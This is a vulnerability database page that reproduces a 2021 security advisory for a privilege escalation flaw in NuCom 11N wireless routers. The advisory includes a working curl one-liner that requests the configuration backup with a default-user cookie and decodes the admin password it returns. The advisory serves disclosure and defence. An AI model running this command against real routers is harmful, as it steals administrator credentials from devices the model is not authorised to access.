Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation

🗓️ 10 Mar 2021 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 131 Views

NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation vulnerability. Non-privileged user can elevate privileges via HTTP reques

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2021-47726
31 Dec 202521:43
circl
CNNVD		NuCom 11N 安全漏洞
31 Dec 202500:00
cnnvd
CVE		CVE-2021-47726
31 Dec 202518:39
cve
Cvelist		CVE-2021-47726 NuCom 11N Wireless Router 5.07.90 Privilege Escalation via Configuration Backup
31 Dec 202518:39
cvelist
EUVD		EUVD-2025-206084
31 Dec 202521:30
euvd
NVD		CVE-2021-47726
31 Dec 202519:15
nvd
Positive Technologies		PT-2025-54420
31 Dec 202500:00
ptsecurity
Vulnrichment		CVE-2021-47726 NuCom 11N Wireless Router 5.07.90 Privilege Escalation via Configuration Backup
31 Dec 202518:39
vulnrichment
<html><body><p>NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation


Vendor: NUEVAS COMUNICACIONES IBERIA, S.A.
Product web page: https://www.nucom.es
Affected version: 5.07.90_multi_NCM01
                  5.07.89_multi_NCM01
                  5.07.72_multi_NCM01

Summary: The NC routers upgrades your network to the next
generation of WiFi. With combined wireless speeds of up to
1750 Mbps, the device provides better speeds and wireless
range. Includes 2 FXS ports for any VoIP service. If you
prefer a wired connection, the NC routers have gigabit
ports to provide an incredibly fast, lag-free experience.
3.0 ports allow you to power a robust home Internet network
by sharing printers, flash storage, FTP servers, or media
players.

Desc: The application suffers from a privilege escalation
vulnerability. The non-privileged default user (user:user)
can elevate his/her privileges by sending a HTTP GET request
to the configuration backup endpoint and disclose the http
super password (admin credentials) in Base64 encoded value.
Once authenticated as admin, an attacker will be granted
access to the additional and privileged pages.

Tested on: GoAhead-Webs
           Tenda


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5629
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php


01.03.2021

--


lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \
&gt; curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \
&gt; -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \
&gt; grep -oP '(?&lt;=http_supper_passwd=).*' | \
&gt; base64 -d 2&gt;/dev/null | \
&gt; xargs echo -n ; \
&gt; echo -e '\n-----------\n'
The admin password is: 
MammaMia123
-----------

lqwrm@metalgear:~/prive$
</p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Mar 2021 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.17.5
CVSS 48.7
EPSS0.00103
SSVC
nucom 11nwireless routerprivilege escalationhttpvulnerabilityuser:userbase64authenticationvendorpocgjoko krsticpacketstormsecurityexploit-dbcxsecurityibmcloud
131